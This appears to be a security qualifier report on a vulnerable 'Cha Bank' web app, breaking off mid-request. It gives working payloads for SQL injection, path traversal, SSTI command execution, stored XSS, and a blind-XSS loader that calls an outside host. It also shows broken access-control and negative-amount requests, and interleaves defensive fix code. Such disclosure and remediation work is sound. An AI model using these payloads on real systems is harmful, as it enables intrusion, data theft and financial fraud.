QUALIFIERS REPORT
Name: Yousuf Abdullah Fahim
Username: oxf4h1m
Email: Oxf4h1m@[Link]
Vuln #1 Critical
Title: Union-based SQL injection on /api/search_beneficiaries via POST parameter search
Vulnerable path: [Link]
Description:
This vulnerability is a Union-based SQL Injection found in the
/api/search_beneficiaries endpoint via the POST parameter search. It allows an
attacker to inject malicious SQL queries to extract sensitive data from the
database. The impact is significant as an attacker can fully compromise the
confidentiality of the database by retrieving arbitrary data, such as all usernames,
passwords, and emails from the users table, leading to unauthorized access and
a severe breach of user privacy.
Steps to reproduce:
1. Log in to the Cha Bank account.
2. In the account dashboard, search for a beneficiary with the following payload:
aa' UNION SELECT full_name,null,email,user_id,password,null FROM users -- -
3. Observe that the response to the POST request to /api/search_beneficiaries contains the details of all users from the users table.
POC:
All rows of the users table retrieved using union-based SQL injection via the POST parameter search on /api/search_beneficiaries.
Impact:
The impact of this vulnerability is critical. A successful exploitation allows
an attacker to leverage the application's database connection to execute
arbitrary SQL commands. This directly compromises the confidentiality of
all data stored in the database, including personally identifiable information
(PII), password hashes, session tokens, and financial records. Furthermore,
depending on the privileges of the database user, this could potentially lead
to data Integrity loss (modification or deletion of records) and limited
Availability loss if the attacker were able to execute denial-of-service
queries. This breach can result in severe regulatory fines, reputational
damage, and widespread user account compromise.
Vuln #2 Critical
Title: Union-based SQL injection on /api/audit_logs via POST parameter user_agent
Vulnerable path: [Link]
Description:
This vulnerability is a Union-based SQL Injection found in the /api/audit_logs
endpoint via the POST parameter user_agent. It allows an attacker to inject
malicious SQL queries to extract sensitive data from the database. The impact is
significant as an attacker can fully compromise the confidentiality of the
database by retrieving arbitrary data, such as all usernames, passwords, and
emails from the users table, leading to unauthorized access and a severe breach
of user privacy.
Steps to reproduce:
1. Log in to the Cha Bank account.
2. In the account dashboard, go to audit logs and filter the logs by user agent with the following payload:
Mozilla' UNION SELECT null,email,user_id,full_name FROM users -- -
3. Observe that the response to the POST request to /api/audit_logs contains the details of all users from the users table.
POC:
All rows of the users table retrieved using union-based SQL injection via the POST parameter user_agent on /api/audit_logs.
Impact:
The impact of this vulnerability is critical. A successful exploitation allows
an attacker to leverage the application's database connection to execute
arbitrary SQL commands. This directly compromises the confidentiality of
all data stored in the database, including personally identifiable information
(PII), password hashes, session tokens, and financial records. Furthermore,
depending on the privileges of the database user, this could potentially lead
to data Integrity loss (modification or deletion of records) and limited
Availability loss if the attacker were able to execute denial-of-service
queries. This breach can result in severe regulatory fines, reputational
damage, and widespread user account compromise.
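The two findings above share one root cause: the search and user_agent values are concatenated into the SQL text, so the UNION and the trailing comment rewrite the query. The following is an added example, not code from the report or from the Cha Bank application. It reproduces the pattern against a constructed in-memory SQLite database (the users and beneficiaries columns are assumed so that the report's six-column payload lines up) and puts the parameterized rewrite next to it:

```python
# Added example (not the Cha Bank code): string-concatenated query versus a
# bound-parameter query, run against a constructed SQLite database.
import sqlite3

# Constructed sample data; names, e-mails and hashes are made up.
SAMPLE_USERS = [
    (1, "Attacker One", "attacker@example.test", "hash$a1"),
    (2, "Victim Two", "victim@example.test", "hash$v2"),
    (3, "Admin Three", "admin@example.test", "hash$ad3"),
]
SAMPLE_BENEFICIARIES = [
    # name, account_number, bank, nickname, owner_id, notes
    ("Aamir Hossain", "100100100100", "Cha Bank", "rent", 1, None),
    ("Nusrat Jahan", "100200200200", "Cha Bank", "sister", 2, None),
]

# The payload from step 2 of Vuln #1: six selected columns to match the
# beneficiary SELECT below; "-- -" comments out the rest of the statement.
REPORT_PAYLOAD = ("aa' UNION SELECT full_name,null,email,user_id,password,null "
                  "FROM users -- -")


def build_demo_db():
    """Create the in-memory schema both handlers below query."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (user_id INTEGER PRIMARY KEY, full_name TEXT,
                            email TEXT, password TEXT);
        CREATE TABLE beneficiaries (name TEXT, account_number TEXT, bank TEXT,
                                    nickname TEXT, owner_id INTEGER, notes TEXT);
    """)
    conn.executemany("INSERT INTO users VALUES (?,?,?,?)", SAMPLE_USERS)
    conn.executemany("INSERT INTO beneficiaries VALUES (?,?,?,?,?,?)",
                     SAMPLE_BENEFICIARIES)
    return conn


def search_beneficiaries_vulnerable(conn, owner_id, search):
    """The anti-pattern: the search term is spliced into the SQL text. The
    owner_id filter looks like a scoping control, but the injected UNION
    and trailing comment make it irrelevant."""
    sql = ("SELECT name, account_number, bank, nickname, owner_id, notes "
           "FROM beneficiaries WHERE owner_id = ? "
           "AND name LIKE '%" + search + "%'")
    return conn.execute(sql, (owner_id,)).fetchall()


def _escape_like(value):
    """Escape LIKE metacharacters so the term can only match literal text."""
    return (value.replace("\\", "\\\\")
                 .replace("%", "\\%")
                 .replace("_", "\\_"))


def search_beneficiaries_safe(conn, owner_id, search):
    """Fix: the term is a bound parameter, never part of the statement, and
    LIKE wildcards inside it are escaped so it cannot widen the match."""
    sql = ("SELECT name, account_number, bank, nickname, owner_id, notes "
           "FROM beneficiaries WHERE owner_id = ? "
           "AND name LIKE ? ESCAPE '\\'")
    pattern = "%" + _escape_like(search) + "%"
    return conn.execute(sql, (owner_id, pattern)).fetchall()


if __name__ == "__main__":
    db = build_demo_db()
    print("vulnerable:", search_beneficiaries_vulnerable(db, 1, REPORT_PAYLOAD))
    print("fixed:     ", search_beneficiaries_safe(db, 1, REPORT_PAYLOAD))
    print("fixed, real search:", search_beneficiaries_safe(db, 1, "Aamir"))
```

Run with the report's payload, the first function returns every users row (full_name, email, user_id and password hash in the beneficiary columns), while the second returns nothing because the payload is now just a search term. The same change applies to the user_agent filter on /api/audit_logs.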
Vuln #3 Critical
Title: LFI via path traversal on /download via GET parameter file
Vulnerable path: [Link]
Description:
This vulnerability allows an attacker to perform Local File Inclusion (LFI)
through a Path Traversal attack on the /download endpoint via the file
GET parameter. The application fails to properly sanitize or validate user
input, allowing relative directory traversal sequences (../, URL-encoded as
%2e%2e%2f) to access files outside the intended download directory. This
critical flaw exposes the file system structure and allows unauthorized
retrieval of application files.
Steps to reproduce:
1. Log in to the Cha Bank account.
2. Visit the following link in your browser:
[Link]oad?file=%2e%2e%2f%2e%2e%[Link]
3. Observe that the source code of the bank application is downloaded.
POC:
Source code of [Link] via path traversal
Impact:
The impact of this LFI vulnerability is severe. By leveraging path traversal,
an attacker can read sensitive system files (e.g., /etc/passwd) or, more
critically, the source code of the application (e.g., [Link], configuration
files). Access to source code may reveal hardcoded credentials, API keys,
intellectual property, and the internal logic of the application, which in turn
facilitates the discovery of further, more serious vulnerabilities (like
database credentials or business logic flaws), leading to full system
compromise.
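How a download handler should treat the file parameter, as an added example that is not the application's code. It builds a throwaway directory tree (the file names and layout are constructed; the report does not show the real ones) and contrasts the os.path.join anti-pattern with a check on the fully resolved path:

```python
# Added example (not the Cha Bank code): traversal-safe resolution of a
# ?file= parameter, demonstrated on a constructed temporary directory tree.
import os
import tempfile
from pathlib import Path
from urllib.parse import unquote


class DownloadRefused(Exception):
    """The requested name does not denote a file inside the download directory."""


def build_demo_tree():
    """Constructed layout: a downloads folder two levels below the app root,
    one legitimate statement inside it, and the app source outside it."""
    root = Path(tempfile.mkdtemp(prefix="chabank_demo_"))
    downloads = root / "static" / "downloads"
    downloads.mkdir(parents=True)
    (downloads / "statement_100183379430_20251122162140.pdf").write_bytes(b"%PDF-1.4 demo\n")
    (root / "app.py").write_text("SECRET_KEY = 'demo-only'\n")
    return root, downloads


def vulnerable_download_path(download_dir, requested):
    """The anti-pattern behind the finding: decode and join. os.path.join
    keeps '..' components and discards the base for an absolute path, so
    the result can be any file the process can read."""
    return os.path.normpath(os.path.join(str(download_dir), unquote(requested)))


def vulnerable_download_escapes(download_dir, requested):
    """True when the anti-pattern yields an existing file outside download_dir."""
    path = vulnerable_download_path(download_dir, requested)
    base = str(Path(download_dir).resolve()) + os.sep
    return os.path.isfile(path) and not os.path.realpath(path).startswith(base)


def resolve_download(download_dir, requested, already_decoded=False):
    """Return the real path of `requested` inside `download_dir`, or raise.

    Decode exactly once: frameworks already decode the query string, and a
    second decode would turn %252e%252e%252f into ../ after the check."""
    name = requested if already_decoded else unquote(requested)
    if "\x00" in name:
        raise DownloadRefused("NUL byte in file name")
    base = Path(download_dir).resolve()
    candidate = (base / name).resolve()      # collapses '..', follows symlinks
    try:
        candidate.relative_to(base)          # ValueError when outside base
    except ValueError:
        raise DownloadRefused(f"{name!r} escapes the download directory") from None
    if candidate == base or not candidate.is_file():
        raise DownloadRefused(f"{name!r} is not a downloadable file")
    return candidate


def is_refused(download_dir, requested):
    """True when resolve_download rejects the request (used by the checks)."""
    try:
        resolve_download(download_dir, requested)
    except DownloadRefused:
        return True
    return False
```

The check is made on the path after resolve(), so encoded dots, absolute paths and symlinks planted in the download directory are all caught by the same comparison. For statement files (Vuln #15 downloads them through the same endpoint) the name must additionally be tied to the requesting account; path containment alone does not give that.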
Vuln #4 Critical
Title: Broken access control on /api/add_balance leads to adding arbitrary balance
Vulnerable path: [Link]
Description:
This vulnerability is a Broken Access Control flaw (missing function-level
authorization, combined with a client-controlled target account) in the
/api/add_balance endpoint. The application performs no authorization check
on who may call this endpoint, so any authenticated user can supply an
arbitrary account number (AC) and balance amount (BL) in the JSON POST body
and execute a privileged operation, adding funds, against any account,
including their own, without administrative credentials.
Steps to reproduce:
1. Log in to the Cha Bank account.
2. Copy your account number from the dashboard.
3. Run the following curl command from your terminal, replacing the AC value with your account number:
curl --path-as-is -i -s -k -X $'POST' \
  -H $'Host: [Link]' \
  -H $'Content-Type: application/json' \
  -H $'Content-Length: 44' \
  --data-binary $'{\"AC\":\"100123312938\",\"BL\":\"100000000000000\"}' \
  $'[Link]
4. Observe that the requested balance has been added to your account.
POC:
Account with extra balance added via broken access control on /api/add_balance
Impact:
The impact of this vulnerability is Critical, representing a complete failure
of core banking application logic. Successful exploitation allows any
authenticated user to fraudulently inflate their account balance to an
arbitrary amount, leading to direct financial loss for the bank and complete
erosion of the system's integrity and trust. Furthermore, if the attacker can
target other users' accounts, this could lead to widespread disruption of
financial data and legal liability. This flaw is equivalent to unauthorized
administrative access over the financial state of user accounts.
Vuln #5 Critical
Title: RCE via SSTI on /calculate-rewards via POST parameter expression
Vulnerable path: [Link]
Description:
This vulnerability is a Server-Side Template Injection (SSTI) flaw in the
/calculate-rewards endpoint via the expression POST parameter.
The application insecurely processes user input as an executable template,
allowing an attacker to inject template language syntax. By exploiting
internal Python objects and functions, this SSTI escalates directly to
Remote Code Execution (RCE) on the server hosting the application, as
demonstrated by the ability to execute the ls -lra command.
Steps to reproduce:
1. Log in to the Cha Bank account.
2. Browse the application and intercept any API request with Burp Suite, then send it to Repeater.
3. Replace the raw request with the following raw request (substituting your own session cookie) and send it to the server:
POST /calculate-rewards HTTP/2
Host: [Link]
Cookie: session=eyJhY2NvdW50X251bWJlciI6IjEwMDE4MzM3OTQzMCIsImF1ZGl0X2xvZ2dlZCI6dHJ1ZSwiZnVsbF9uYW1lIjoiJ1wiPjxoMT52aWN0aW0iL[Link]-nXFnouMuyl-EH4tVFdY2sM
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: [Link]
Content-Type: application/x-www-form-urlencoded
Content-Length: 181
Origin: [Link]
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

card_type=mastercard&dining=10&groceries=100&travel=10&gas=1000&other=100&expression=%7b%7b%20self.__init__.__globals__.__builtins__.__import__('os').popen('ls%20-lra').read()%7d%7d
The SSTI payload in the expression parameter is:
%7b%7b%20self.__init__.__globals__.__builtins__.__import__('os').popen('ls%20-la').read()%7d%7d
4. Observe the output of the ls command in the response.
POC:
RCE via SSTI on /calculate-rewards via POST parameter expression
Impact:
The impact is Critical (Maximum Confidentiality, Integrity, and Availability).
Successful RCE grants the attacker full control over the compromised
server's operating system. The attacker can execute arbitrary commands,
leading to data theft (including all application files and database
credentials), installation of backdoors or malware, modification of
application logic, and disruption of service. This vulnerability results in an
immediate and complete system compromise.
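The fix for an endpoint that evaluates a user-supplied expression is to never hand that string to a template engine or to eval(). The following is an added example, not the Cha Bank code: a whitelist arithmetic evaluator over the spend categories seen in the request above. The variable names are taken from the request body; the rewards formula and the length limit are assumptions.

```python
# Added example (not the Cha Bank code): a whitelist expression evaluator
# that replaces template rendering of a user-supplied "expression" value.
import ast
import operator

# Spend categories from the report's request body, as constructed sample input.
SAMPLE_SPEND = {"dining": 10, "groceries": 100, "travel": 10, "gas": 1000, "other": 100}

# The report's payload as it arrives in the expression parameter (URL-decoded).
REPORT_PAYLOAD = ("{{ self.__init__.__globals__.__builtins__"
                  ".__import__('os').popen('ls -la').read() }}")

_BINARY = {ast.Add: operator.add, ast.Sub: operator.sub,
           ast.Mult: operator.mul, ast.Div: operator.truediv}
_UNARY = {ast.USub: operator.neg, ast.UAdd: operator.pos}
MAX_EXPRESSION_LEN = 200   # assumed limit; also bounds parser recursion


def safe_eval_rewards(expression, variables):
    """Evaluate an arithmetic expression over named spend variables.

    Only int/float literals, the names in `variables`, + - * / and unary
    sign are accepted. Attribute access, calls, subscripts, unknown names,
    comparisons, exponentiation (cheap CPU/memory DoS) and every other node
    raise ValueError, so the payload never reaches a template engine."""
    if len(expression) > MAX_EXPRESSION_LEN:
        raise ValueError("expression too long")
    try:
        tree = ast.parse(expression, mode="eval")
    except (SyntaxError, ValueError, RecursionError):
        raise ValueError("not a valid arithmetic expression") from None

    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and type(node.value) in (int, float):
            return node.value
        if isinstance(node, ast.Name):
            if node.id in variables:
                return variables[node.id]
            raise ValueError(f"unknown variable {node.id!r}")
        if isinstance(node, ast.BinOp) and type(node.op) in _BINARY:
            return _BINARY[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY:
            return _UNARY[type(node.op)](walk(node.operand))
        raise ValueError(f"disallowed syntax: {type(node).__name__}")

    try:
        return walk(tree)
    except ZeroDivisionError:
        raise ValueError("division by zero") from None


def is_rejected(expression, variables=SAMPLE_SPEND):
    """True when the evaluator refuses the expression (used by the checks)."""
    try:
        safe_eval_rewards(expression, variables)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(safe_eval_rewards("dining*3 + groceries*2 + travel + gas + other", SAMPLE_SPEND))
    print("report payload rejected:", is_rejected(REPORT_PAYLOAD))
```

The report's payload is not even a syntax error for this evaluator: "{{ ... }}" parses as a nested set literal, and the walk rejects it at the first node type outside the whitelist, before any name is looked up or any call is made.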
Vuln #6 Critical
Title: Blind Stored XSS on /api/transfer via POST parameter reference
Vulnerable path: [Link]
Description:
This vulnerability is a Blind Stored Cross-Site Scripting (XSS) flaw in the
/api/transfer endpoint, affecting the reference POST parameter.
The malicious script injected into the transfer reference field is stored
persistently in the application's database and is later rendered and
executed when an unaware victim (often a backend administrator, analyst,
or the transfer recipient) views the transaction details or a related
dashboard. The 'blind' nature means the attacker does not see the payload
execute but confirms it using an external detection service.
Steps to reproduce:
1. Log in to the Cha Bank account.
2. Click "Transfer money" on the user dashboard.
3. Transfer a small amount to the victim account with the following payload in the reference field (replace the base64 blob with your own blind XSS detector payload):
''\">><img src=x onError=alert('xss')><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzLnJlcG9ydC9jL2I3MiI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= onerror=eval(atob([Link]))>
4. Log in to the victim account and observe the XSS alert; the blind XSS detection server also records the victim's information.
POC:
Successful XSS execution on victim dashboard
Impact:
The impact is Critical. Because the payload is executed on a victim's
machine (which could be a high-privilege administrative user), a successful
XSS exploit can lead to session hijacking (stealing the victim's session
cookie), data exfiltration (reading sensitive information displayed on the
victim's dashboard), and client-side malicious redirects. If executed in an
administrative panel, this breach can result in full compromise of the
application's backend, allowing the attacker to perform actions as the
administrator, such as modifying user data, accessing audit logs, or
escalating privileges further.
Vuln #7 Critical
Title: Stored XSS via profile picture upload
Vulnerable path: [Link]
Description:
This vulnerability is a Stored Cross-Site Scripting (XSS) flaw caused by
insecure file upload handling. The application allows users to upload SVG
files as profile pictures without adequately sanitizing the content. Since
SVG is an XML-based image format, it can contain executable JavaScript
within event handlers (like onload or onclick). The application then
serves this malicious SVG file directly, causing the stored script to execute
in the victim's browser whenever they view the profile.
Steps to reproduce:
1. Log in to the Cha Bank account.
2. Go to Settings.
3. Upload the following SVG image as the profile picture (save the following code as an .svg file):
<svg xmlns:dc="[Link]"
     xmlns:cc="[Link]"
     xmlns:rdf="[Link]"
     xmlns:svg="[Link]"
     xmlns="[Link]"
     xmlns:sodipodi="[Link]"
     xmlns:inkscape="[Link]"
     width="601" height="601" onload="alert('xss')" onclick="alert(1)">
  <metadata id="metadata18">
    <rdf:RDF>
      <cc:Work rdf:about="">
        <dc:format>image/svg+xml</dc:format>
        <dc:type rdf:resource="[Link]" />
        <dc:title></dc:title>
      </cc:Work>
    </rdf:RDF>
  </metadata>
</svg>
4. Visit the profile picture and observe the XSS alert.
POC:
Stored XSS on
[Link]
victim00x_img_xss.svg via profile picture upload
Impact:
The impact is Critical. Since the payload is stored and executes every time
the profile picture is viewed, an attacker can leverage this XSS to
compromise the accounts of other users or administrators. This allows for
session hijacking (stealing cookies), credential harvesting, redirecting
victims to malicious sites, and performing unauthorized actions on the
victim's behalf (e.g., initiating transfers) by manipulating the browser's
Document Object Model (DOM).
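Both stored XSS findings (#6 and #7) come down to one control: untrusted content has to be inert where it is rendered. As an added example that is not the application's code, the block below audits an uploaded SVG before it is stored and escapes a transfer reference before it is rendered. The sample SVG and reference string are constructed to mirror the report's payloads rather than copied from them, and the tag and attribute lists are a policy choice for profile pictures, not a complete SVG security model:

```python
# Added example (not the Cha Bank code): pre-storage audit of SVG uploads
# and context-aware escaping of the transfer reference field.
import html
import re
import xml.etree.ElementTree as ET

# Constructed inputs modelled on the report's payloads.
REPORT_STYLE_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     width="601" height="601" onload="alert('xss')" onclick="alert(1)">
  <metadata id="metadata18"/>
</svg>"""

CLEAN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="64" height="64">
  <circle cx="32" cy="32" r="30" fill="#1e90ff"/>
</svg>"""

TRANSFER_REFERENCE_PAYLOAD = "''\\\">><img src=x onError=alert('xss')>"

# A profile picture never needs any of these.
ACTIVE_TAGS = {"script", "foreignobject", "iframe", "embed", "object",
               "set", "animate", "animatetransform", "use"}
URI_ATTRS = {"href", "src"}


def _local(name):
    """Strip an XML namespace: '{http://www.w3.org/1999/xlink}href' -> 'href'."""
    return name.rsplit("}", 1)[-1].lower()


def audit_svg(data):
    """Return the reasons an SVG upload should be refused (empty = acceptable).

    Refuse rather than clean: stripping pieces out of untrusted XML is
    error-prone, and a rejected upload costs the user nothing."""
    head = data[:4096].lower()
    if b"<!doctype" in head or b"<!entity" in head:
        return ["DTD or entity declaration (XXE / entity-expansion risk)"]
    try:
        root = ET.fromstring(data)   # production code: defusedxml.ElementTree
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    if _local(root.tag) != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ACTIVE_TAGS:
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            name = _local(attr)
            # Browsers drop ASCII control characters from URLs, so
            # "java\nscript:" is still javascript:; normalise before matching.
            cleaned = re.sub(r"[\x00-\x20]", "", value)
            if name.startswith("on"):
                findings.append(f"event handler {name}= on <{tag}>")
            elif name in URI_ATTRS and re.match(r"(javascript|data|vbscript):", cleaned, re.I):
                findings.append(f"{name}= with {cleaned.split(':', 1)[0].lower()}: URI on <{tag}>")
            elif name == "style" and re.search(r"url\s*\(|expression\s*\(|@import", cleaned, re.I):
                findings.append(f"style= with external reference on <{tag}>")
    return findings


def render_reference(reference):
    """Escape a stored transfer reference for an HTML text node or a
    double-quoted attribute (the output-encoding fix for Vuln #6)."""
    return html.escape(reference, quote=True)
```

Even with the audit in place, serve uploaded images from a separate origin or with Content-Disposition: attachment, so that a file which slips through cannot run in the application's origin. For the reference field, escaping has to happen at output time in the template, not at input time, because the same value may be rendered in more than one context.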
Vuln #8 Critical
Title: Broken Access Control on /api/balance via account_number leads to PII disclosure and full account info
Vulnerable path: [Link]
Description:
This vulnerability is a Broken Access Control flaw (specifically, an IDOR -
Insecure Direct Object Reference) in the /api/balance endpoint. The
application uses the account_number parameter in the POST request to
fetch account details but fails to perform an authorization check to confirm
that the requesting user owns that account. This permits any authenticated
user to simply change the account_number value to a victim's account
number and retrieve their sensitive financial and personal data.
Steps to reproduce:
1. Log in to the Cha Bank account.
2. Intercept the POST request to /api/balance with Burp Suite and send it to Repeater.
3. Change the account_number to the victim's account number and send the request to the server.
4. Observe the victim's information in the response, including PII such as email, card CVV and balance.
POC:
Victim's PII retrieved using broken access control on /api/balance
Impact:
The impact is Critical. This vulnerability results in the unauthorized
disclosure of highly sensitive personally identifiable information (PII) and
financial data (including card CVV, which facilitates financial fraud). The
ability to retrieve arbitrary user data completely compromises the
Confidentiality of all customer records. This leads to a severe breach of
user privacy, potential identity theft, fraudulent transactions, and significant
regulatory and legal liability for the organization.
Vuln #9 Critical
Title: Account Takeover via broken client-side OTP generation
Vulnerable path: [Link]
Description:
This vulnerability is a Broken Authentication flaw in the password reset
mechanism: the OTP (One-Time Password) is handled on the client side. When a
password reset is requested for a user ID, the OTP value is visible in the
POST request the browser sends to /api/request_password_reset, so it is
generated, or at least exposed, in the attacker's own browser rather than
delivered only through the victim's email or phone. This defeats the purpose
of the OTP: an attacker can intercept the code and complete the password
reset for any victim without access to the victim's email or phone.
Steps to reproduce:
1. Navigate to [Link]
2. Enter the victim's user ID and click "Send OTP".
3. Intercept the POST request to /api/request_password_reset and observe the OTP in a POST parameter; copy the OTP and forward the request to the server.
4. Use the copied OTP to change the victim's password and log in to the victim's account.
POC:
OTP visible in the client-side request.
Impact:
31
The impact is Critical. This vulnerability allows an unprivileged attacker
to perform a complete Account Takeover (ATO) for any user in the system,
including administrators or high-value accounts, simply by knowing the
victim's user ID. This bypasses the multi-factor security measure (OTP) and
leads to the total loss of Confidentiality, Integrity, and Availability for the
compromised account. Since this is a banking application, the attacker
gains access to financial details, PII, and the ability to initiate fraudulent
transactions.
.
32
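What a correct server-side OTP flow looks like, as an added example that is not the Cha Bank implementation: the request step returns only a generic status, the code leaves through a simulated out-of-band channel, and verification is constant-time, time-boxed, single-use and attempt-limited. The in-memory store, the pepper and the delivery callback are assumptions standing in for the real database, configuration and mail/SMS sender:

```python
# Added example (not the Cha Bank code): OTP issued and checked only on the
# server; the client never sees the code in a request or response.
import hashlib
import hmac
import secrets
import time

OTP_DIGITS = 6
OTP_TTL_SECONDS = 300
MAX_ATTEMPTS = 5


class Outbox:
    """Stand-in for the e-mail/SMS sender; records what the user would receive."""

    def __init__(self):
        self.codes = {}

    def __call__(self, user_id, otp):
        self.codes[user_id] = otp


class OtpStore:
    """One pending reset per user: HMAC of the code, expiry, attempt counter."""

    def __init__(self, pepper=None):
        self._pending = {}
        # Server-side secret (assumed to come from configuration) so that a
        # leaked table cannot be brute-forced offline over the 10**6 codes.
        self._pepper = pepper or secrets.token_bytes(32)

    def _digest(self, user_id, otp):
        return hmac.new(self._pepper, f"{user_id}:{otp}".encode(), hashlib.sha256).digest()

    def request_password_reset(self, user_id, deliver, now=None):
        """Handler for the request step. The OTP is generated here, handed to
        the out-of-band channel, and never placed in the HTTP response."""
        now = time.time() if now is None else now
        otp = f"{secrets.randbelow(10 ** OTP_DIGITS):0{OTP_DIGITS}d}"
        self._pending[user_id] = {"digest": self._digest(user_id, otp),
                                  "expires": now + OTP_TTL_SECONDS,
                                  "attempts": 0}
        deliver(user_id, otp)
        # Same status whether or not the user exists: no user enumeration.
        return {"status": "sent"}

    def verify(self, user_id, submitted, now=None):
        """Handler for the reset step: time-boxed, attempt-limited,
        constant-time comparison, and single use on success."""
        now = time.time() if now is None else now
        entry = self._pending.get(user_id)
        if entry is None:
            return False
        if now > entry["expires"] or entry["attempts"] >= MAX_ATTEMPTS:
            del self._pending[user_id]
            return False
        entry["attempts"] += 1
        if hmac.compare_digest(entry["digest"], self._digest(user_id, str(submitted))):
            del self._pending[user_id]      # cannot be replayed
            return True
        return False


def wrong_code(otp):
    """A code guaranteed to differ from `otp` (for the checks)."""
    return "000000" if otp != "000000" else "111111"
```

The attempt limit matters as much as the secrecy of the code: a six-digit OTP with no limit and a five-minute window is brute-forceable through the reset endpoint itself.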
Vuln #10 Critical
Title: Business logic error in /api/transfer via POST parameter amount allows attacker to steal other users' balance
Vulnerable path: [Link]
Description:
This vulnerability is a severe Business Logic Error (BLE) in the fund transfer
functionality exposed via the /api/transfer endpoint. The application
fails to properly validate the sign of the amount POST parameter, allowing
an authenticated attacker to submit a negative transfer amount. When
processed, a negative transfer from A to B is incorrectly interpreted by the
system's logic as adding money to A's account while deducting the absolute
value of that amount from B's account, effectively reversing the transaction
flow and allowing the attacker to steal funds from the victim.
Steps to reproduce:
1. Log in to the Cha Bank account.
2. Click "Transfer money" on the user dashboard.
3. Fill in the form, submit it, and intercept the POST request to /api/transfer.
4. Change the amount to a negative value such as -100 and send the request to the server.
5. Observe in the response that your balance has increased and the victim's balance has decreased.
6. Repeat steps 2-5 two or three times to confirm.
POC:
Unauthorized fund transfer executed by submitting a negative value in the amount parameter.
Impact:
The impact is Critical (Maximum Financial Impact). This Business Logic
Error directly leads to financial fraud and the theft of funds from other
users' accounts. The vulnerability compromises the fundamental Integrity
of the banking ledger, allowing an attacker to drain arbitrary amounts from
victim accounts and credit their own account. This flaw results in
immediate, quantifiable financial loss for customers and the bank,
necessitating an emergency patch and extensive audit.
Vuln #11 Critical
Title: Business logic error in /api/international_transfer via POST parameter amount allows attacker to add arbitrary balance
Vulnerable path: [Link]
Description:
This vulnerability is a severe Business Logic Error (BLE) in the international
fund transfer functionality exposed via the
/api/international_transfer endpoint. The application fails to
enforce the constraint that the amount POST parameter must be a positive
value. An authenticated attacker can submit a negative amount, which the
server-side logic incorrectly processes as a transaction that credits the
attacker's own account instead of debiting it. This flaw allows the attacker
to arbitrarily add funds to their balance without authorization.
Steps to reproduce:
1. Log in to the Cha Bank account.
2. Navigate to [Link]
3. Fill in the form, submit it, and intercept the POST request to /api/international_transfer.
4. Change the amount to a negative value such as -100 and send the request to the server.
5. Observe in the response that your balance has increased.
6. Repeat steps 2-5 two or three times to confirm.
POC:
Balance successfully added using a negative amount.
Impact:
The impact is Critical (Maximum Financial Impact). This Business Logic
Error allows any authenticated user to fraudulently inflate their account
balance by submitting negative transfer amounts, leading to direct,
quantifiable financial loss for the bank. The flaw fundamentally
compromises the Integrity of the application's financial records and is
equivalent to an attacker being able to execute unauthorized deposits.
Immediate remediation is required to prevent large-scale financial abuse.
Vuln #12 Critical
Title: Business logic error in /api/pay_bill via POST parameter amount allows attacker to add arbitrary balance
Vulnerable path: [Link]
Description:
This vulnerability is a severe Business Logic Error (BLE) in the bill payment
functionality exposed via the /api/pay_bill endpoint. The application
fails to validate that the amount POST parameter is a positive value before
processing the transaction. An authenticated attacker can submit a
negative amount, which the server-side logic incorrectly handles, resulting
in the crediting of the attacker's own account balance instead of the
expected debit. This flaw allows the attacker to arbitrarily add funds to their
balance without authorization.
Steps to reproduce:
1. Log in to the Cha Bank account.
2. Navigate to [Link]
3. Select any category, fill in the form, submit it, and intercept the POST request to /api/pay_bill.
4. Change the amount to a negative value such as -100 and send the request to the server.
5. Observe in the response that your balance has increased.
6. Repeat steps 2-5 two or three times to confirm.
POC:
Balance successfully added using a negative amount.
Impact:
The impact is Critical (Maximum Financial Impact). This Business Logic
Error allows any authenticated user to fraudulently credit their account
balance repeatedly by submitting negative payment amounts. This flaw
compromises the fundamental Integrity of the application's financial ledger
and directly leads to financial loss for the bank. Immediate correction is
mandatory to prevent unauthorized fund manipulation and systemic abuse.
Vuln #13 Critical
Title: Broken Access Control (BAC/IDOR) on /api/delete_beneficiary via beneficiary_id leads to deleting any beneficiary of other users
Vulnerable path: [Link]
Description:
This vulnerability is a Broken Access Control flaw, specifically an Insecure
Direct Object Reference (IDOR), in the /api/delete_beneficiary
endpoint. The application uses the beneficiary_id POST parameter to
identify the object to delete but fails to perform an authorization check to
verify that the current user owns that beneficiary ID. This allows any
authenticated attacker to supply a victim's beneficiary ID and successfully
delete it, causing unauthorized data loss and disruption to the victim's
account functionality.
Steps to reproduce:
1. Log in to the Cha Bank account.
2. Either intercept the beneficiary delete request, or replace any raw API request with the following raw request (substituting your own session cookie) and send it to the server:
POST /api/delete_beneficiary HTTP/2
Host: [Link]
Cookie: session=eyJhY2NvdW50X251bWJlciI6IjEwMDEyMzMxMjkzOCIsImF1ZGl0X2xvZ2dlZCI6dHJ1ZSwiZnVsbF9uYW1lIjoiJ1wiPjxoMT57ezcqN319Iiwi[Link].Xc3H5DwqQuL_jOfZyo5OdUj3CFg
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: [Link]
Content-Type: application/json
Content-Length: 23
Origin: [Link]
Sec-Fetch-Dest: empty
